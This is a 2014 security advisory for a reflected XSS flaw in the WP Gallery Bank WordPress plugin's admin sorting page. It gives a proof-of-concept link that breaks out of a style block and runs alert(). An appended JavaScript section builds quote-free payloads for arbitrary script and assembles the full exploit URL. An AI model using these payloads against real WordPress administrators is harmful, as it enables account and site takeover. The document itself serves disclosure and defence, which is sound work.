WP Gallery Bank - Best Gallery Albums Plugin 2.0.26 - 3.0.69, Reflected XSS

The order_id query-string argument of the gallery_album_sorting admin page is output without sanitization, which allows injection of arbitrary content into the WordPress admin panel. Quotes are escaped with backslashes before being output, so the attacker must take this into account when generating a payload; the proof of concept below avoids quotes entirely by carrying the JavaScript as character codes through String.fromCharCode.

Homepage

https://wordpress.org/plugins/gallery-bank/changelog/

CVSS Score

5

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Update to version 3.0.70

Proof of Concept

If a user who has administrative access and is already logged in can be tricked into visiting a specially crafted link, then arbitrary JavaScript is executed in the context of the admin panel. The example below triggers an alert box upon visiting the page: the leading {}</style> closes the style block the value is reflected into, the script runs, and a trailing <style> reopens the block so the rest of the page still parses.

http://localhost/wp-admin/admin.php?page=gallery_album_sorting&order_id={}%3C/style%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,34,46,34,41%29%29%3C/script%3E%3Cstyle%3E
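The following is an added example (it is not code from the advisory or from the plugin) showing how a payload of the shape used in the proof of concept is built and checked against the backslash-escaping described above. It assumes the value is reflected inside an inline style block and that the escaping behaves like PHP's addslashes; the base URL is a hypothetical target.

```javascript
// Added example (not part of the advisory): build and check a quote-free
// payload of the shape used in the proof of concept above.
// Assumed: the order_id value is reflected inside an inline <style> block of
// the admin page, and quotes are backslash-escaped (PHP addslashes-style)
// before output, so any JavaScript that needs quotes must be carried as
// character codes through String.fromCharCode.

// Decode a String.fromCharCode(...) argument list back to source text
// (the codes in the advisory's PoC link decode to alert(".")).
function decodeCharCodes(codes) {
  return String.fromCharCode(...codes);
}

// Encode arbitrary JavaScript so the injected markup contains no ' " or \.
function toCharCodeEval(js) {
  const codes = Array.from(js, ch => ch.charCodeAt(0));
  return `eval(String.fromCharCode(${codes.join(',')}))`;
}

// Wrap the script in markup that closes the surrounding <style> element,
// runs the script, and reopens <style> so the rest of the page still parses.
function buildStyleBreakoutPayload(js) {
  return `{}</style><script>${toCharCodeEval(js)}</script><style>`;
}

// Model of the escaping the advisory describes: quotes (and backslashes)
// get a backslash prefix before being echoed. This is what breaks a naive
// payload such as alert("x").
function addslashes(s) {
  return s.replace(/(['"\\])/g, '\\$1');
}

// A payload only works as written if the escaping step leaves it unchanged.
function survivesAddslashes(payload) {
  return addslashes(payload) === payload;
}

// Build the full link against a caller-supplied base URL (hypothetical
// target). encodeURIComponent yields the %3C/%3E/%2F escapes; it leaves
// parentheses raw, which a browser accepts just as it accepts %28/%29.
function buildPocUrl(base, js) {
  const param = encodeURIComponent(buildStyleBreakoutPayload(js));
  return `${base}/wp-admin/admin.php?page=gallery_album_sorting&order_id=${param}`;
}

// Demo against the PoC's own character codes and a fresh payload.
const pocCodes = [97, 108, 101, 114, 116, 40, 34, 46, 34, 41];
console.log(decodeCharCodes(pocCodes));                                   // alert(".")
console.log(survivesAddslashes('alert("x")'));                            // false
console.log(survivesAddslashes(buildStyleBreakoutPayload('alert("x")'))); // true
console.log(buildPocUrl('http://localhost', 'alert(document.domain)'));
```

The survivesAddslashes check is the practitioner's quick test for this class of reflection: if a candidate payload changes after backslash-escaping, it will not execute as written and must be rewritten without quotes.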

Timeline

  • 2014-10-10: Discovered
  • 2014-10-10: Reported to vendor
  • 2014-10-11: Vendor responded, 3.0.70 released, issue resolved
  • 2014-10-13: CVE requested
  • 2014-10-14: CVE assigned
  • 2014-10-18: Advisory released